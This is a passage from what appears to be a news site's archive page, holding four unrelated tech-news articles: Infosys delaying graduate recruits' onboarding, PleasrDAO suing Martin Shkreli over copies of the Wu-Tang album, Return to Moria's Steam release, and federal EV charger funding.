Despite successfully completing the pre-training, the promised results were never communicated, leaving the graduates in limbo for over 20 days. To their shock, instead of receiving their joining dates, these graduates were informed that they needed to retake the pre-training exam offline, once again without any renumeration.

The Register reported today that Infosys recruits were subjected to “multiple unpaid virtual and in-person training sessions and assessments,” citing emails sent to recruits. It also said that recruits were told they would no longer be considered for onboarding if they didn’t attend these sessions, at least one of which is six weeks long, per The Register.

CEO claims recruits will work at Infosys eventually

Following NITES’ letter, Infosys CEO Salil Parekh claimed this week that the graduates would start their jobs but didn’t provide more details about when they would start or why there have been such lengthy delays and repeated training sessions. Speaking to Indian news site Press Trust of India, Parekh said:

Every offer that we have given, that offer will be someone who will join the company. We changed some dates, but beyond that everyone will join Infosys and there is no change in that approach.

Notably, in an earnings call last month [PDF], Infosys CFO Jayesh Sanghrajka said that Infosys Is “looking at hiring 15,000 to 20,000” recent graduates this year, “depending on how we see the growth.” It’s unclear if that figure includes the 2,000 people who NITES is concerned about.

In March, Infosys reported having 317,240 employees, which represented its first decrease in employee count since 2001. Parekh also recently claimed Infosys isn’t expecting layoffs relating to emerging technologies like AI. In its most recent earnings report, Infosys reported a 5.1 percent year-over-year (YoY) increase in profit and a 2.1 percent YoY increase in revenues.

NITES has previously argued that because of the delays, Infosys should offer “full salary payments for the period during which onboarding has been delayed” or, if onboarding isn’t feasible, that Infosys help the recruited people find alternative jobs elsewhere within Infosys.

Infosys accused of hurting Indian economy

NITES’ letter argues that Infosys has already negatively impacted India’s economic growth, stating:

These young engineering graduates are integral to the future of our nation’s IT industry, which plays a pivotal role in our economy. By delaying their careers and subjecting them to unpaid work and repeated assessments, Infosys is not only wasting their valuable time but also undermining the contributions they could be making to India’s growth.

Infosys hasn’t explained why the onboarding of thousands of recruits has taken longer to begin than expected. One potential challenge is logistics. Infosys has also previously delayed onboarding in relation to the COVID-19 pandemic, which hit India particularly hard.

Additionally, India is dealing with a job shortage. Two years is a long time to wait to start a job, but many may have minimal options. A June 2024 study of Indian hiring trends [PDF] reported that IT job hiring in hardware and network declined 9 percent YoY, and hiring in software and software services declined 5 percent YoY. The Indian IT sector saw attrition rates drop from 27 percent in 2022 to 16 to 19 percent last year, per Indian magazine Frontline. This has contributed to there being fewer IT jobs available in the country, including entry-level positions. With people holding onto their jobs, there have also been reduced hiring efforts. Infosys, for example, didn’t do any campus hiring in 2023 or 2024, and neither did India-headquartered Tata Consultancy Services, Frontline noted.

Over the past two years, Infosys has maintained a pool of people to pull from at a time when an IT skills gap in India is expected in the coming years that coincides with a lack of opportunities for recent IT graduates. However, the company risks losing the people it recruited as they might decide to look elsewhere. At the same time, they deal with financial and mental health concerns and make requests for government intervention.

“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years Read More »

turns-out-martin-shkreli-copied-his-$2m-wu-tang-album—and-sent-it-to-“50-different-chicks”

Turns out Martin Shkreli copied his $2M Wu-Tang album—and sent it to “50 different chicks”

STILL MAKING FRIENDS —

“Of course I made MP3 copies, they’re like hidden in safes all around the world.”

Martin Shkreli—he's back, and he's still got copies of that Wu-Tang Clan album.

Enlarge / Martin Shkreli—he’s back, and he’s still got copies of that Wu-Tang Clan album.

The members of PleasrDAO are, well, pretty displeased with Martin Shkreli.

The “digital autonomous organization” spent $4.75 million to buy the fabled Wu-Tang Clan album Once Upon a Time in Shaolin, which had only been produced as a single copy. The album had once belonged to Shkreli, who purchased it directly from Wu-Tang Clan for $2 million in 2015. But after Shkreli became the “pharma bro” poster boy for price gouging in the drug sector, he ended up in severe legal trouble and served a seven-year prison sentence for securities fraud.

He also had to pay a $7.4 million penalty in that case, and the government seized and then sold Once Upon a Time in Shaolin to help pay the bill.

The album was truly “one of a kind,” a protest against the devaluation of music in the digital age and the kind of fascinating curio that instantly made its owners into “interesting people.” The album came as a two-CD set inside a nickel and silver box inscribed with the Wu-Tang logo, and the full package included a pair of customized audio speakers and a 174-page leather book featuring lyrics and “anecdotes on the production.”

In a complicated transaction, PleasrDAO purchased the album from an unnamed intermediary, who had first purchased it from the government. As part of that deal, PleasrDAO created a non-fungible token (NFT—remember those?) to show ownership of the album. The New York Times has a good description of what this entailed:

To tie “Once Upon a Time” to the digital realm, an NFT was created to stand as the ownership deed for the physical album, said Peter Scoolidge, a lawyer who specializes in cryptocurrency and NFT deals and was involved in the transaction. The 74 members of PleasrDAO… share collective ownership of the NFT deed, and thus own the album.

Makin’ copies…

But after purchasing the album and sharing the collective ownership of its NFT, PleasrDAO discovered that its “one of a kind” object wasn’t quite as exclusive as it had thought.

Shkreli had, in fact, made copies of the music. Lots of copies. On June 30, 2022, PleasrDAO said that Shkreli played music from the album on his YouTube channel and stated, “Of course I made MP3 copies, they’re like hidden in safes all around the world… I’m not stupid. I don’t buy something for two million dollars just so I can keep one copy.”

Shkreli began taunting PleasrDAO members about the album, telling one of them, “I literally play it on my discord all the time, you’re an idiot” and claiming that PleasrDAO was concerned about an album that “>5000 people have.” Shkreli claimed on a 2024 podcast that he had “burned the album and sent it to like, 50 different chicks”—and that this had been extremely good for his sex life.

Shkreli even offered to send copies of the album to random Internet commenters if they would just send him their “email addy.” He also told people to “look out for a torrent” and hosted listening parties for the album on his X account, which reached “potentially over 4,900 listeners.”

We know all of these details because PleasrDAO has sued Shkreli, claiming that he is acting in violation of the asset forfeiture order and that he is misappropriating “trade secrets” under New York law.

Shkreli “knew that by distributing copies of the Album’s data and files or by playing it publicly, his actions would decrease the Album’s marketability and value,” said PleasrDAO. They have asked a federal judge to stop Shkreli—and also to get them a list of everyone he has distributed the album to.

The Wu-Tang Clan album sits inside this box.

Enlarge / The Wu-Tang Clan album sits inside this box.

Not a secret

Shkreli’s response to all this is, in essence, “so what’s the problem?”

When he purchased the album for $2 million in 2015, he also acquired 50 percent of the copyrights to the package. Before the album was seized by the government, Shkreli says he took advantage of his copyright ownership to make copies as he was “permitted to do under his original purchase agreement.” The government, he says, seized only the individual, physical copy of the album, and Shkreli was within his rights to retain the copies he had already made.

As for trade secrets, well—a trade secret actually has to be “secret.” Thanks to his own actions, Shkreli has made sure that the album is not a secret. “Because Defendant legally purchased and shared the work before the Forfeiture Order and the Asset Purchase Agreement, the work is no longer a trade secret,” his lawyers wrote in his defense.

The Empire State strikes back

On August 26, 2024, a federal judge in Brooklyn issued a preliminary injunction (PDF) in the case as the two parties prepare to battle things out in court. The injunction prevents Shkreli from “possessing, using, disseminating, or selling any interest in the Wu-Tang Clan album ‘Once Upon a Time in Shaolin’ (the ‘Album’), including its data and files or the contents of the Album.”

Furthermore, Shkreli has to turn over “all of his copies, in any form, of the Album or its contents to defense counsel.” He also must file an affidavit swearing that he “no longer possesses any copies, in any form, of the Album or its contents.”

By the end of September 2024, Shkreli further must submit a list of “the names and contact information of the individuals to whom he distributed the data and files” and say if he made any money for doing so.

Turns out Martin Shkreli copied his $2M Wu-Tang album—and sent it to “50 different chicks” Read More »

return-to-moria-arrives-on-steam-with-mining,-crafting,-and-a-“golden-update”

Return to Moria arrives on Steam with mining, crafting, and a “Golden Update”

You know what they awoke in the darkness of Khazad-dûm —

Changes to combat, crafting, and ambient music came from player feedback.

Screenshot from Return to Moria showing two dwarves dancing in front of a roaring forge

Enlarge / It’s hard work, survival crafting, but there are moments for song, dance, and tankards.

North Beach Games

The dwarves of J.R.R. Tolkien’s writing are, according to the author himself, “a tough, thrawn race for the most part, secretive, retentive of the memory of injuries (and of benefits),” and “lovers… of things that take shape under the hands of the craftsmen rather than things that live by their own life.”

Is it secrecy and avarice that explains why The Lord of the Rings: Return to Moria spent its first year of existence as an exclusive to the Epic Games Store? None can say for certain. But the survival crafting game has today arrived on Steam and Xbox, adding to its PlayStation and EGS platforms and bringing a 1.3 “Golden Update” to them all. Steam Deck compatibility is on its way to Verified, with a bunch of handheld niceties already in place.

The Golden Update grants new and existing players a procedurally generated sandbox mode to complement the game’s (also generated) campaign, new weapons and armor, crossplay between all platforms with up to eight players, specific sliders for difficulty settings, and… a pause function in offline single-player, which seemingly was not there before.

Launch trailer for Return to Moria on Steam and consoles (and its Golden Update).

What are you actually doing in Return to Moria? You, a dwarf in the Fourth Age of Middle-Earth, are tasked by Gimli Lockbearer with heading into Moria (i.e. Khazad-dûm) to recover its treasures. Except every Moria is different, generated from random generation seeds. You mine for materials, use materials to make gear and goods, set up base camps with stations and fixtures, and, of course, fight the things you awaken in the depths.

  • The campaign is procedurally generated, but it tells a narrative with a beginning, middle, and end. And runes—lots of runes.

    North Beach Games

  • Dwarves? Underground? Making stuff? Yes, of course.

    North Beach Games

  • There will be goblins.

    North Beach Games

Not only does a release on new cross-compatible platforms give you a chance to check out a potentially overlooked gem, but this is also version 1.3 of the game. Reviews of the game at release in October 2023 were closely aligned around one point: it needed more time to cook.

PC Gamer found the game authentic to Tolkien’s lore, intriguing in its depictions of underground spaces, and alternately goofy and harrowing in building and fighting. But bugs, stuttering, clipping errors, and disbelief-shattering oddities brought the experience down a good deal. Polygon was more critical of the game’s tile-based layouts and laborious backtracking. “A few patches could see this become a survival game that can hold its own against the more popular entries in the genre,” wrote Ford James.

In a “Quality of Life Showcase,” Game Director Jon-Paul Dumont details how the game has advanced over the past 10 months. The map is color-coded and easier to read, the ambient music and transitions are improved, combat improvements make it feel better and more grounded (another point of review contention), and player gripes about inventory management, cooking, building, and crafting have been tackled.

I haven’t played enough of the game to render any kind of verdict on it, but I’m always eager to see the work of a team actively fixing after launch—digging in, if you will.

Return to Moria arrives on Steam with mining, crafting, and a “Golden Update” Read More »

feds-award-$521-million-in-ev-charger-funds,-but-rollout-remains-slow

Feds award $521 million in EV charger funds, but rollout remains slow

got the plug? —

The awards are part of a $7.5 billion program for EV charger infrastructure.

A logo of an EV painted on the ground

Getty Images

The federal government awarded another $521 million in EV charger funding today. It’s the latest tranche of money to be awarded from a $7.5 billion program authorized by the 2022 Inflation Reduction Act, which aims to build out fast chargers along interstate highways as well as bringing charging infrastructure to underserved communities.

$321 million from today’s announcement will be spent on 41 different projects across the country—these projects are a mix of level 2 AC chargers as well as DC fast chargers. The remaining $200 million will continue funding DC fast chargers along designated highway corridors.

The Joint Office of Energy and Transportation, which administers the federal funding, called out a $15 million project to install chargers at 53 sites in Milwaukee and a $3.9 million project to install publicly accessible chargers on the Sioux Reservation in North Dakota as examples of the latest awards.

“Today’s investments in public community charging fill crucial gaps and provide the foundation for a zero-emission future where everyone can choose to ride or drive electric for greater individual convenience and reduced fueling costs, as well as cleaner air and lower healthcare costs for all Americans,” said Gabe Kline, executive director of the Joint Office of Energy and Transportation.

The Biden administration set a goal of 500,000 EV chargers nationwide by 2030. The Joint Office’s latest data shows more than 189,000 chargers across the country, although fewer than 44,000 of these were DC fast chargers.

But it cites real improvements over the past few years—56 percent of the most heavily trafficked highways have a fast charger every 50 miles, up from 38 percent in January 2021. And in June, it says an additional 3,000 charging ports were added to the national network. Other funding has gone to repairing or upgrading existing infrastructure, starting with a currently inoperable site in Washington, DC.

At the same time, progress has not been especially rapid for the highway charger NEVI (National Electric Vehicle Infrastructure) program. NEVI funds are administered by the states, similar to the way they manage federal highway funding, and the extra layers of bureaucracy have meant that the first NEVI-funded charging station—located in Ohio—only became operational in mid-December 2023.

Feds award $521 million in EV charger funds, but rollout remains slow Read More »